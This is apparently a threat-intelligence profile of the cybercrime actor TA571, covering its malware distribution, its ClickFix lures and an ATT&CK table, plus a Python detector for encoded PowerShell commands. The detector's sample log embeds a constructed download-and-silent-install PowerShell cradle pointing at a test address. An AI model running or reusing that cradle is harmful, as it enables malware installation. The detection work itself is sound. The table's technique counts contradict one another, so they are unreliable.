
TA571

Also known as: TA571

TA571 is a financially motivated cybercriminal threat actor and high-volume spam distributor that operates spam botnets and has been associated with the 404TDS traffic distribution system. Proofpoint has tracked TA571 since 2019 distributing and installing malware for cybercriminal customers, and prior reporting indicates the actor operates as an FIA (financially motivated initial access) group. TA571 has been described as an initial access broker/group whose infections can lead to ransomware. Observed malware distributed by TA571 includes Ursnif, ZLoader, DanaBot, IcedID (including the Forked variant), Rhadamanthys, DarkGate, NetSupport RAT, Matanbuchus, and malware associated with TA866/Asylum Ambuscade. Reporting also notes delivery of AsyncRAT and other malware via 404TDS. TA571 commonly uses high-volume malspam, thread hijacking, HTML attachments, malicious URLs, password-protected ZIP archives, legitimate file hosting services, compromised or spoofed infrastructure, and gated delivery chains with IP and geo-fencing. The actor has also used OneDrive links in PDF attachments and VBS, JavaScript, MSI, HTA, and PowerShell-based infection chains.

TA571 was an early observed user of the ClickFix social-engineering technique. Proofpoint first observed TA571 using ClickFix on 1 March 2024 in a campaign of more than 100,000 messages targeting thousands of organizations globally. In these campaigns, HTML attachments impersonated Microsoft Word or OneDrive content and tricked users into copying and executing base64-encoded PowerShell commands, leading to payloads such as DarkGate, Matanbuchus, and NetSupport RAT. TA571 also used root-certificate-themed lures similar to ClearFake. Proofpoint coined the term ClickFix based on activity by TA571 and ClearFake. TA571 has also been linked to major malware delivery campaigns.

In October 2023, Proofpoint observed TA571 delivering Forked IcedID in thread-hijacking campaigns using 404TDS URLs, password-protected ZIP files, and regsvr32 execution. In January 2024, Proofpoint attributed spam distribution in a TA866-related campaign to TA571, where invoice-themed emails with PDF attachments and OneDrive-hosted JavaScript led to WasabiSeed and Screenshotter. Proofpoint first tracked Rhadamanthys in December 2022 in a campaign attributed to TA571, with post-exploitation attributed to TA866. TA571 is affiliated in reporting with infrastructure and services around 404TDS; one report states Vacant Viper is known to affiliate with TA571 and that 404TDS delivered IcedID and other malware. Proofpoint has observed TA571 activity decrease or disappear from email campaign data since mid-2024.
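The ClickFix chain described above ends with a user pasting a base64-encoded PowerShell command that pulls a payload from the actor's infrastructure. The following Python is an added detection example, not code from Proofpoint or from this page: it decodes `-EncodedCommand` blobs found in process-creation telemetry and flags scripts that fetch remote content and hand it to a system binary such as msiexec (T1059.001, T1027, T1105, T1218.007 in the tradecraft table below). The key=value log format, host names, parent-process field and the TEST-NET address in the sample lines are all constructed assumptions, not observed data.

```python
"""Decode PowerShell -EncodedCommand invocations from process-creation
logs and flag download-and-execute cradles. Added example; the log
format and all sample values are constructed."""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings most often seen in telemetry. The capture is the base64 blob.
ENCODED_FLAG_RE = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})"
)

# Substrings whose presence in the decoded script indicates remote content
# being pulled onto the host and executed (Ingress Tool Transfer / proxy
# execution). Matched case-insensitively against the decoded text.
SUSPICIOUS_MARKERS = (
    "invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
    "net.webclient", "start-bitstransfer", "invoke-expression", "iex ",
    "frombase64string", "msiexec", "mshta", "regsvr32",
)

# key=value pairs; quoted values may contain spaces and '=' padding.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    timestamp: str
    host: str
    parent: str
    decoded: str
    markers: tuple[str, ...]


def encode_ps(script: str) -> str:
    """UTF-16LE + base64, the form PowerShell expects after -EncodedCommand.
    Used here only to build the constructed sample log lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str | None:
    """Return the decoded script, or None if the blob is not a valid
    UTF-16LE PowerShell payload (bad alphabet, bad padding, odd length)."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def parse_line(line: str) -> dict[str, str]:
    """Parse one constructed process-creation event into a field dict."""
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    fields["timestamp"] = line.split(" ", 1)[0]
    return fields


def analyze_line(line: str) -> Finding | None:
    """Return a Finding if the line carries an encoded command that decodes
    to a script containing any suspicious marker; otherwise None."""
    ev = parse_line(line)
    m = ENCODED_FLAG_RE.search(ev.get("cmdline", ""))
    if not m:
        return None
    decoded = decode_encoded_command(m.group(1))
    if decoded is None:
        return None
    lowered = decoded.lower()
    hits = tuple(mk for mk in SUSPICIOUS_MARKERS if mk in lowered)
    if not hits:
        return None
    return Finding(ev["timestamp"], ev.get("host", "?"), ev.get("parent", "?"), decoded, hits)


def scan(log_lines: list[str]) -> list[Finding]:
    return [f for f in (analyze_line(ln) for ln in log_lines) if f is not None]


# Constructed sample telemetry (not real logs). The first line models a
# ClickFix-style paste into the Run dialog: explorer.exe spawns PowerShell with
# an encoded fetch-and-install cradle. 203.0.113.10 is a TEST-NET address.
SAMPLE_LOG = [
    "2024-03-01T10:12:03Z host=WS-0142 image=powershell.exe parent=explorer.exe "
    'cmdline="powershell -NoProfile -EncodedCommand '
    + encode_ps(r"Invoke-WebRequest http://203.0.113.10/u.msi -OutFile $env:TEMP\u.msi; msiexec /i $env:TEMP\u.msi /qn")
    + '"',
    # Benign encoded command: decodes cleanly but carries no marker.
    "2024-03-01T10:15:44Z host=WS-0077 image=powershell.exe parent=svchost.exe "
    'cmdline="powershell -ec ' + encode_ps("Get-Service | Where-Object Status -eq Running") + '"',
    # No encoded flag at all.
    "2024-03-01T10:16:02Z host=WS-0077 image=cmd.exe parent=explorer.exe "
    'cmdline="cmd /c dir C:\\Users"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} parent={f.parent} markers={f.markers}")
        print("  decoded:", f.decoded)
```

Decoding before matching matters: the same cradle hidden behind `-e`, `-enc` or the full flag produces identical decoded text, so the marker list is written once against the plaintext rather than against every encoding variant. In production the parent-process field is the strongest ClickFix signal, since a user pasting into the Run dialog yields explorer.exe as the parent of PowerShell.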


MITRE ATT&CK tradecraft

15 distinct techniques observed across reporting, grouped by tactic. 7 of 15 tactics; 19 techniques. ×N = number of intelligence reports citing this technique.
TA0001 Initial Access (3 techniques)
  T1078      Valid Accounts
  T1189      Drive-by Compromise
  T1566      Phishing  ×3
  T1566.001  Spearphishing Attachment  ×3
  T1566.002  Spearphishing Link  ×2

TA0002 Execution (2 techniques)
  T1059      Command and Scripting Interpreter
  T1059.001  PowerShell  ×3
  T1059.003  Windows Command Shell
  T1204      User Execution
  T1204.002  Malicious File  ×2

TA0003 Persistence (1 technique)
  T1078      Valid Accounts

TA0004 Privilege Escalation (1 technique)
  T1078      Valid Accounts

TA0005 Stealth (4 techniques)
  T1027      Obfuscated Files or Information  ×2
  T1036      Masquerading
  T1078      Valid Accounts
  T1218      System Binary Proxy Execution
  T1218.007  Msiexec

TA0009 Collection (1 technique)
  T1115      Clipboard Data

TA0011 Command and Control (1 technique)
  T1105      Ingress Tool Transfer  ×2
IOCs / Observables

40 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. IOC values are gated and are not shown on this page.
